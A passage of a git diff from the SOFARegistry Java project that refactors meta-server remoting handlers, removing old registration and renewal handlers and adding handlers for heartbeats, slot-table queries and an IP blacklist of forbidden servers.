License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting.handler; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.meta.registry.Registry; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * Handle data node's register request - * @author shangyu.wh - * @version $Id: DataNodeHandler.java, v 0.1 2018-01-18 18:04 shangyu.wh Exp $ - */ -public class DataNodeHandler extends AbstractServerHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeHandler.class); - - @Autowired - private Registry metaServerRegistry; - - @Override - public Object reply(Channel channel, DataNode dataNode) { - NodeChangeResult nodeChangeResult; - try { - nodeChangeResult = metaServerRegistry.register(dataNode); - LOGGER.info("Data node {} register success!result:{}", dataNode, nodeChangeResult); - } catch (Exception e) { - LOGGER.error("Data node register error!", e); - throw new RuntimeException("Data node register error!", e); - } - return nodeChangeResult; - } - - @Override - public Class interest() { - return DataNode.class; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/FetchProvideDataRequestHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/FetchProvideDataRequestHandler.java index cef3777fd..1d6d45655 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/FetchProvideDataRequestHandler.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/FetchProvideDataRequestHandler.java @@ -20,71 +20,63 @@ import com.alipay.sofa.registry.common.model.console.PersistenceData; import com.alipay.sofa.registry.common.model.metaserver.FetchProvideDataRequest; import com.alipay.sofa.registry.common.model.metaserver.ProvideData; -import com.alipay.sofa.registry.common.model.store.DataInfo; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; import com.alipay.sofa.registry.store.api.DBResponse; -import com.alipay.sofa.registry.store.api.DBService; import com.alipay.sofa.registry.store.api.OperationStatus; -import com.alipay.sofa.registry.store.api.annotation.RaftReference; +import org.springframework.beans.factory.annotation.Autowired; /** * Handle session node's query request, such as get ProvideData by dataInfoId + * * @author shangyu.wh * @version $Id: GetNodesRequestHandler.java, v 0.1 2018-03-02 15:12 shangyu.wh Exp $ */ -public class FetchProvideDataRequestHandler extends AbstractServerHandler { - - private static final Logger DB_LOGGER = LoggerFactory.getLogger( - FetchProvideDataRequestHandler.class, "[DBService]"); +public class FetchProvideDataRequestHandler extends BaseMetaServerHandler { - @RaftReference - private DBService persistenceDataDBService; + private static final Logger DB_LOGGER = + LoggerFactory.getLogger(FetchProvideDataRequestHandler.class, "[DBService]"); - @Override - public Object reply(Channel channel, FetchProvideDataRequest fetchProvideDataRequest) { - try { - DBResponse ret = persistenceDataDBService.get(fetchProvideDataRequest.getDataInfoId()); - if (ret == null) { - DB_LOGGER.error("get null Data from db!"); - throw new RuntimeException("Get null Data from db!"); - } + @Autowired private ProvideDataService provideDataService; - if (ret.getOperationStatus() == OperationStatus.SUCCESS) { - PersistenceData data = (PersistenceData) ret.getEntity(); - String dataInfoId = DataInfo.toDataInfoId(data.getDataId(), data.getInstanceId(), - data.getGroup()); - ProvideData provideData = new ProvideData(new ServerDataBox(data.getData()), - dataInfoId, data.getVersion()); - DB_LOGGER.info("get ProvideData {} from DB success!", provideData); - return provideData; - } else if (ret.getOperationStatus() == OperationStatus.NOTFOUND) { - ProvideData provideData = new ProvideData(null, - fetchProvideDataRequest.getDataInfoId(), null); - DB_LOGGER.warn("has not found data from DB dataInfoId:{}", - fetchProvideDataRequest.getDataInfoId()); - return provideData; - } else { - DB_LOGGER.error("get Data DB status error!"); - throw new RuntimeException("Get Data DB status error!"); - } + @Override + public Object doHandle(Channel channel, FetchProvideDataRequest fetchProvideDataRequest) { + try { + DBResponse ret = + provideDataService.queryProvideData(fetchProvideDataRequest.getDataInfoId()); - } catch (Exception e) { - DB_LOGGER.error("get persistence Data dataInfoId {} from db error!", - fetchProvideDataRequest.getDataInfoId()); - throw new RuntimeException("Get persistence Data from db error!", e); - } + if (ret.getOperationStatus() == OperationStatus.SUCCESS) { + PersistenceData data = ret.getEntity(); + ProvideData provideData = + new ProvideData( + new ServerDataBox(data.getData()), + fetchProvideDataRequest.getDataInfoId(), + data.getVersion()); + DB_LOGGER.info("get ProvideData {} from DB success!", provideData); + return provideData; + } else if (ret.getOperationStatus() == OperationStatus.NOTFOUND) { + ProvideData provideData = + new ProvideData(null, fetchProvideDataRequest.getDataInfoId(), null); + DB_LOGGER.warn( + "has not found data from DB dataInfoId:{}", fetchProvideDataRequest.getDataInfoId()); + return provideData; + } else { + DB_LOGGER.error("get Data DB status error!"); + throw new RuntimeException("Get Data DB status error!"); + } + } catch (Exception e) { + DB_LOGGER.error( + "get persistence Data dataInfoId {} from db error!", + fetchProvideDataRequest.getDataInfoId()); + throw new RuntimeException("Get persistence Data from db error!", e); } + } - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return FetchProvideDataRequest.class; - } -} \ No newline at end of file + @Override + public Class interest() { + return FetchProvideDataRequest.class; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/GetChangeListRequestHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/GetChangeListRequestHandler.java deleted file mode 100644 index e373f9fc7..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/GetChangeListRequestHandler.java +++ /dev/null @@ -1,63 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting.handler; - -import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; -import com.alipay.sofa.registry.common.model.metaserver.GetChangeListRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.meta.registry.Registry; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * Handle other datacenter's meta node's request for get the change node list - * @author shangyu.wh - * @version $Id: GetChangeListRequestHandler.java, v 0.1 2018-02-12 16:14 shangyu.wh Exp $ - */ -public class GetChangeListRequestHandler extends AbstractServerHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger("META-CONNECT"); - - @Autowired - private Registry metaServerRegistry; - - @Override - public Object reply(Channel channel, GetChangeListRequest getChangeListRequest) { - DataCenterNodes dataCenterNodes; - try { - dataCenterNodes = metaServerRegistry.getDataCenterNodes(getChangeListRequest - .getNodeType()); - LOGGER.info("Get change Node list {} success!from {}", dataCenterNodes, - channel.getRemoteAddress()); - } catch (Exception e) { - LOGGER.error("Get change Node list error!", e); - throw new RuntimeException("Get change Node list error!", e); - } - return dataCenterNodes; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return GetChangeListRequest.class; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/GetNodesRequestHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/GetNodesRequestHandler.java deleted file mode 100644 index 916d5c38e..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/GetNodesRequestHandler.java +++ /dev/null @@ -1,63 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting.handler; - -import com.alipay.sofa.registry.common.model.metaserver.GetNodesRequest; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.meta.registry.Registry; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * Handle session/data node's query request, such as getAllNodes request - * and current this is no use for meta node, it's instead by RAFT - * @author shangyu.wh - * @version $Id: GetNodesRequestHandler.java, v 0.1 2018-03-02 15:12 shangyu.wh Exp $ - */ -public class GetNodesRequestHandler extends AbstractServerHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger("META-CONNECT"); - - @Autowired - private Registry metaServerRegistry; - - @Override - public Object reply(Channel channel, GetNodesRequest getNodesRequest) { - NodeChangeResult nodeChangeResult; - try { - nodeChangeResult = metaServerRegistry.getAllNodes(getNodesRequest.getNodeType()); - LOGGER.info("Get {} change node list {} success!from {}", - getNodesRequest.getNodeType(), nodeChangeResult, channel.getRemoteAddress()); - } catch (Exception e) { - LOGGER.error("Get node list error!", e); - throw new RuntimeException("Get node list error!", e); - } - return nodeChangeResult; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return GetNodesRequest.class; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/GetSlotTableRequestHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/GetSlotTableRequestHandler.java new file mode 100644 index 000000000..dd088af62 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/GetSlotTableRequestHandler.java @@ -0,0 +1,74 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.handler; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.metaserver.GetSlotTableRequest; +import com.alipay.sofa.registry.common.model.metaserver.GetSlotTableResult; +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.meta.metaserver.CurrentDcMetaServer; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-11 11:23 yuzhi.lyz Exp $ + */ + +// for cross-dc sync use only +public final class GetSlotTableRequestHandler extends BaseMetaServerHandler { + + private static final Logger LOGGER = LoggerFactory.getLogger("META-SLOT"); + + @Autowired private CurrentDcMetaServer currentDcMetaServer; + + @Override + public Object doHandle(Channel channel, GetSlotTableRequest getNodesRequest) { + final long epochOfNode = getNodesRequest.getEpochOfNode(); + final SlotTable currentTable = currentDcMetaServer.getSlotTable(); + if (epochOfNode == currentTable.getEpoch()) { + // not change, return null + return new GenericResponse().fillSucceed(null); + } + if (epochOfNode > currentTable.getEpoch()) { + // should not happen + LOGGER.error( + "[SLOT-EPOCH] meta's epoch={} should not less than node's epoch={}, {}", + currentTable.getEpoch(), + epochOfNode, + channel.getRemoteAddress().getAddress().getHostAddress()); + return new GenericResponse().fillFailed("illegal epoch of node"); + } + if (getNodesRequest.getTargetDataNode() == null) { + return new GenericResponse().fillSucceed(currentTable); + } + List dataNodeSlots = + currentTable.transfer( + getNodesRequest.getTargetDataNode(), getNodesRequest.isIgnoredFollowers()); + return new GenericResponse() + .fillSucceed(new GetSlotTableResult(currentTable.getEpoch(), dataNodeSlots)); + } + + @Override + public Class interest() { + return GetSlotTableRequest.class; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/HeartbeatRequestHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/HeartbeatRequestHandler.java new file mode 100644 index 000000000..0c47337e6 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/HeartbeatRequestHandler.java @@ -0,0 +1,335 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.handler; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.BaseHeartBeatResponse; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.exception.SofaRegistryMetaLeaderException; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.metaserver.impl.DefaultCurrentDcMetaServer; +import com.alipay.sofa.registry.server.meta.monitor.data.DataMessageListener; +import com.alipay.sofa.registry.server.meta.monitor.heartbeat.HeartbeatListener; +import com.alipay.sofa.registry.server.meta.monitor.session.SessionMessageListener; +import com.alipay.sofa.registry.server.shared.slot.SlotTableUtils; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * Handle session/data node's heartbeat request + * + * @author shangyu.wh + * @version $Id: RenewNodesRequestHandler.java, v 0.1 2018-03-30 19:58 shangyu.wh Exp $ + */ +@Component +public class HeartbeatRequestHandler extends BaseMetaServerHandler> { + private static final Logger HEARTBEAT_LOG = LoggerFactory.getLogger("HEARTBEAT"); + private static final Logger LOGGER = LoggerFactory.getLogger(HeartbeatRequestHandler.class); + + @Autowired private DefaultCurrentDcMetaServer currentDcMetaServer; + + @Autowired private MetaLeaderService metaLeaderService; + + @Autowired(required = false) + private List dataMessageListeners; + + @Autowired(required = false) + private List sessionMessageListeners; + + @Autowired private NodeConfig nodeConfig; + + /** + * Do handle object. + * + * @param channel the channel + * @param heartbeat the heartbeat + * @return the object + */ + @Override + public Object doHandle(Channel channel, HeartbeatRequest heartbeat) { + boolean success = false; + final Node renewNode = heartbeat.getNode(); + try { + onHeartbeat(heartbeat, channel); + + SlotTable slotTable = currentDcMetaServer.getSlotTable(); + if (!SlotTableUtils.isValidSlotTable(slotTable)) { + return new GenericResponse() + .fillFailed("slot-table not valid, check meta-server log for detail"); + } + BaseHeartBeatResponse response = null; + + final VersionedList metaServerInfo = currentDcMetaServer.getClusterMeta(); + final VersionedList sessionMetaInfo = + currentDcMetaServer.getSessionServerManager().getSessionServerMetaInfo(); + + switch (renewNode.getNodeType()) { + case SESSION: + case DATA: + response = + new BaseHeartBeatResponse( + true, + metaServerInfo, + slotTable, + sessionMetaInfo, + metaLeaderService.getLeader(), + metaLeaderService.getLeaderEpoch()); + break; + case META: + response = + new BaseHeartBeatResponse( + true, + metaServerInfo, + slotTable, + metaLeaderService.getLeader(), + metaLeaderService.getLeaderEpoch()); + break; + default: + break; + } + success = true; + return new GenericResponse().fillSucceed(response); + } catch (Throwable e) { + if (e instanceof SofaRegistryMetaLeaderException) { + SofaRegistryMetaLeaderException exception = (SofaRegistryMetaLeaderException) e; + BaseHeartBeatResponse response = + new BaseHeartBeatResponse(false, exception.getLeader(), exception.getEpoch()); + return new GenericResponse().fillFailData(response); + } + + LOGGER.error("Node {} renew error!", renewNode, e); + return new GenericResponse() + .fillFailed("Node " + renewNode + "renew error!"); + } finally { + HEARTBEAT_LOG.info( + "{},{},addr={}", + success ? 'Y' : 'N', + renewNode.getNodeType(), + channel.getRemoteAddress()); + } + } + + @SuppressWarnings("unchecked") + private void onHeartbeat(HeartbeatRequest heartbeat, Channel channel) { + new DefaultHeartbeatListener(nodeConfig.getLocalDataCenter(), channel).onHeartbeat(heartbeat); + Node node = heartbeat.getNode(); + switch (node.getNodeType()) { + case SESSION: + currentDcMetaServer + .getSessionServerManager() + .renew((SessionNode) node, heartbeat.getDuration()); + onSessionHeartbeat(heartbeat); + return; + case DATA: + currentDcMetaServer.getDataServerManager().renew((DataNode) node, heartbeat.getDuration()); + onDataHeartbeat(heartbeat); + return; + case META: + currentDcMetaServer.renew((MetaNode) node); + return; + default: + break; + } + throw new IllegalArgumentException("node type not correct: " + node.getNodeType()); + } + + private void onSessionHeartbeat(HeartbeatRequest heartbeat) { + if (sessionMessageListeners == null || sessionMessageListeners.isEmpty()) { + return; + } + sessionMessageListeners.forEach( + listener -> { + try { + listener.onHeartbeat(heartbeat); + } catch (Throwable th) { + LOGGER.error("[onDataHeartbeat]", th); + } + }); + } + + private void onDataHeartbeat(HeartbeatRequest heartbeat) { + if (dataMessageListeners == null || dataMessageListeners.isEmpty()) { + return; + } + dataMessageListeners.forEach( + listener -> { + try { + listener.onHeartbeat(heartbeat); + } catch (Throwable th) { + LOGGER.error("[onDataHeartbeat]", th); + } + }); + } + + /** + * Interest class. + * + * @return the class + */ + @Override + public Class interest() { + return HeartbeatRequest.class; + } + + public static class DefaultHeartbeatListener implements HeartbeatListener { + + private static final Logger logger = LoggerFactory.getLogger(DefaultHeartbeatListener.class); + + public static final String KEY_TIMESTAMP_GAP_THRESHOLD = "timestamp.gap.threshold"; + + private static final long timeGapThreshold = Long.getLong(KEY_TIMESTAMP_GAP_THRESHOLD, 2000); + + private final String dataCenter; + + private final Channel channel; + + private volatile boolean isValidChannel = true; + + /** + * Constructor. + * + * @param dataCenter the data center + * @param channel the channel + */ + public DefaultHeartbeatListener(String dataCenter, Channel channel) { + this.dataCenter = dataCenter; + this.channel = channel; + } + + /** + * On heartbeat. + * + * @param heartbeat the heartbeat + */ + @Override + public void onHeartbeat(HeartbeatRequest heartbeat) { + checkIfDataCenterMatched(heartbeat); + checkIfTimeSynced(heartbeat); + checkIfSlotBasicInfoMatched(heartbeat); + closeIfChannelNotValid(); + } + + private void closeIfChannelNotValid() { + if (!isValidChannel) { + + channel.close(); + } + } + + private void checkIfTimeSynced(HeartbeatRequest heartbeat) { + long timestamp = heartbeat.getTimestamp(); + if (System.currentTimeMillis() - timestamp > timeGapThreshold) { + logger.error( + "[checkIfTimeSynced] {} timestamp[{}] is far behind mine[{}]", + heartbeat.getNode(), + timestamp, + System.currentTimeMillis()); + } + } + + private void checkIfSlotBasicInfoMatched(HeartbeatRequest heartbeat) { + + if (heartbeat.getNode() instanceof MetaNode) { + return; + } + + SlotConfig.SlotBasicInfo slotBasicInfo = heartbeat.getSlotBasicInfo(); + if (!SlotConfig.FUNC.equals(slotBasicInfo.getSlotFunc())) { + logger.error( + "[checkIfSlotBasicInfoMatched] {} slot function not match(meta-server: [{}], receive: [{}]", + heartbeat.getNode(), + SlotConfig.FUNC, + slotBasicInfo.getSlotFunc()); + isValidChannel = false; + } + if (SlotConfig.SLOT_NUM != slotBasicInfo.getSlotNum()) { + logger.error( + "[checkIfSlotBasicInfoMatched] {} slot number not match(meta-server: [{}], receive: [{}]", + heartbeat.getNode(), + SlotConfig.SLOT_NUM, + slotBasicInfo.getSlotNum()); + isValidChannel = false; + } + if (SlotConfig.SLOT_REPLICAS != slotBasicInfo.getSlotReplicas()) { + logger.error( + "[checkIfSlotBasicInfoMatched] {} slot replicas not match(meta-server: [{}], receive: [{}]", + heartbeat.getNode(), + SlotConfig.SLOT_REPLICAS, + slotBasicInfo.getSlotReplicas()); + isValidChannel = false; + } + } + + private void checkIfDataCenterMatched(HeartbeatRequest heartbeat) { + String dc = heartbeat.getDataCenter(); + if (!this.dataCenter.equalsIgnoreCase(dc)) { + logger.error( + "[checkIfDataCenterMatched] {} datacenter not match(meta-server: [{}], node: [{}]", + heartbeat.getNode(), + this.dataCenter, + dc); + isValidChannel = false; + } + } + } + + /** + * Sets set current dc meta server. + * + * @param currentDcMetaServer the current dc meta server + * @return the set current dc meta server + */ + public HeartbeatRequestHandler setCurrentDcMetaServer( + DefaultCurrentDcMetaServer currentDcMetaServer) { + this.currentDcMetaServer = currentDcMetaServer; + return this; + } + + /** + * Sets set node config. + * + * @param nodeConfig the node config + * @return the set node config + */ + public HeartbeatRequestHandler setNodeConfig(NodeConfig nodeConfig) { + this.nodeConfig = nodeConfig; + return this; + } + + /** + * Sets set meta leader elector. + * + * @param metaLeaderElector the meta leader elector + * @return the set meta leader elector + */ + public HeartbeatRequestHandler setMetaLeaderElector(MetaLeaderService metaLeaderElector) { + this.metaLeaderService = metaLeaderElector; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/ReNewNodesRequestHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/ReNewNodesRequestHandler.java deleted file mode 100644 index 7425ce141..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/ReNewNodesRequestHandler.java +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting.handler; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.metaserver.ReNewNodesRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.meta.registry.Registry; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * Handle session/data node's heartbeat request - * @author shangyu.wh - * @version $Id: ReNewNodesRequestHandler.java, v 0.1 2018-03-30 19:58 shangyu.wh Exp $ - */ -public class ReNewNodesRequestHandler extends AbstractServerHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(ReNewNodesRequestHandler.class); - - @Autowired - private Registry metaServerRegistry; - - @Override - public Object reply(Channel channel, ReNewNodesRequest reNewNodesRequest) { - Node reNewNode = null; - try { - reNewNode = reNewNodesRequest.getNode(); - metaServerRegistry.reNew(reNewNode, reNewNodesRequest.getDuration()); - } catch (Exception e) { - LOGGER.error("Node " + reNewNode + "reNew error!", e); - throw new RuntimeException("Node reNew error!", e); - } - return null; - } - - @Override - public Class interest() { - return ReNewNodesRequest.class; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/RegistryForbiddenServerHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/RegistryForbiddenServerHandler.java new file mode 100644 index 000000000..6b1b83c7b --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/RegistryForbiddenServerHandler.java @@ -0,0 +1,79 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.handler; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.metaserver.DataOperation; +import com.alipay.sofa.registry.common.model.metaserver.blacklist.RegistryForbiddenServerRequest; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.lease.filter.RegistryForbiddenServerManager; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Mar 18, 2021 + */ +@Component +public class RegistryForbiddenServerHandler + extends BaseMetaServerHandler { + + private static final Logger LOGGER = + LoggerFactory.getLogger(RegistryForbiddenServerHandler.class); + + @Autowired private RegistryForbiddenServerManager registryForbiddenServerManager; + + @Autowired private MetaLeaderService metaLeaderService; + + @Override + public Object doHandle(Channel channel, RegistryForbiddenServerRequest request) { + LOGGER.info( + "[doHandle] from {}, request: {}", channel.getRemoteAddress().getHostName(), request); + if (!metaLeaderService.amILeader()) { + buildFailedResponse("not leader"); + } + DataOperation operation = request.getOperation(); + String ip = request.getIp(); + + boolean success = false; + switch (operation) { + case ADD: + success = registryForbiddenServerManager.addToBlacklist(ip); + break; + case REMOVE: + success = registryForbiddenServerManager.removeFromBlacklist(ip); + break; + default: + break; + } + + if (success) { + return GenericResponse.buildSuccessResponse(); + } + + LOGGER.error("forbidden server: {} operation:{} fail.", ip, operation); + return GenericResponse.buildFailedResponse("handle forbidden server fail."); + } + + @Override + public Class interest() { + return RegistryForbiddenServerRequest.class; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/SessionNodeHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/SessionNodeHandler.java deleted file mode 100644 index f012d76d1..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/SessionNodeHandler.java +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting.handler; - -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.metaserver.SessionNode; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.meta.registry.Registry; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * Handle session node's register request - * @author shangyu.wh - * @version $Id: SessionNodeHandler.java, v 0.1 2018-01-11 17:03 shangyu.wh Exp $ - */ -public class SessionNodeHandler extends AbstractServerHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(SessionNodeHandler.class); - - @Autowired - private Registry metaServerRegistry; - - @Override - public Object reply(Channel channel, SessionNode sessionNode) { - NodeChangeResult nodeChangeResult; - try { - nodeChangeResult = 